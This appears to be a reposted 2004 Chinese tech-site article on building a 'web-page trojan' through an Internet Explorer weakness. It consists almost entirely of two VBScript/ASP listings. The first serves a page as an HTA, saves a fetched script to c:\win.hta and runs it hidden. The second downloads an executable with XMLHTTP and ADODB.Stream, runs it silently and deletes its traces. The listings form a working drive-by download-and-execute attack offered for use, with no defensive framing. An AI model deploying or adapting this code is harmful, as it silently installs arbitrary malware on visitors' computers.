生态的力量
全世界各行各业联合起来,internet一定要实现!
老文章正文

利用IE漏洞实现之网页木马

2004-02-19 eNet&Ciweek

  ---------test.asp(木马主页面之一:生成本地HTA)顶部写如下代码----------------------

  <%response.ContentType="application/hta"%>

  <html>

  <object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>

  <script language="VBScript">

  Function HttpDoGet(url)

  set oReq = CreateObject("Microsoft.XMLHTTP")

  oReq.open "GET",url,false

  oReq.send

  If oReq.status=200 then

  HttpDoGet=oReq.responseTEXT

  SaveFile HttpDoGet,"c:\win.hta" '在C:根目录下生成HTA文件

  Set oReq=nothing

  End if

  End Function

  '保存文本文件,生成本地HTA。

  sub SaveFile(str,fName)

  Dim fso, tf

  Set fso = CreateObject("Scripting.FileSystemObject")

  Set tf = fso.CreateTextFile(fName, True)

  tf.Write str

  tf.Close

  exewin()

  End sub

  '运行函数

  Sub exewin()

  set wshshell=createobject ("wscript.shell" )

  a=wshshell.run ("cmd.exe /c c:\win.hta",0)

  window.close

  End Sub

  '得到本地HTA文件

  HttpDoGet("http://127.0.0.1/ism.mm";;)

  </script>

  </html>

  ---------ism.mm(木马主页面之二:本地HTA页面)顶部写如下代码----------------------

  <html>

  <object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>

  <script language="VBScript">

  Function HttpDoGet(url)

  set oReq = CreateObject("Microsoft.XMLHTTP")

  oReq.open "GET",url,false

  oReq.send

  If oReq.status=200 then

  HttpDoGet=oReq.responseBody

  SaveFile HttpDoGet,"c:\win.exe" '在C:根目录下生成exe文件

  End If

  Set oReq=nothing

  End Function

  '保存二进制文件,在本地生成exe文件。

  sub SaveFile(str,fName)

  Set objStream = CreateObject("ADODB.Stream")

  objStream.Type = 1

  objStream.Open

  objstream.write str

  objstream.SaveToFile fName,2

  objstream.Close()

  set objstream = nothing

  exewin()

  End sub

  '运行函数,执行已经下载的exe程序。

  Sub exewin()

  set wshshell=createobject ("wscript.shell" )

  a=wshshell.run ("cmd.exe /c c:\win.exe",0)

  b=wshshell.run ("cmd.exe /c del c:\win.hta",0)

  window.close

  End Sub

  '得到远程木马程序

  HttpDoGet "http://127.0.0.1/win.exe";;

  </script>

  </html>

相关频道: eNews 老文章

您对本文或本站有任何意见,请在下方提交,谢谢!

投稿信箱:tougao@enet16.com
广告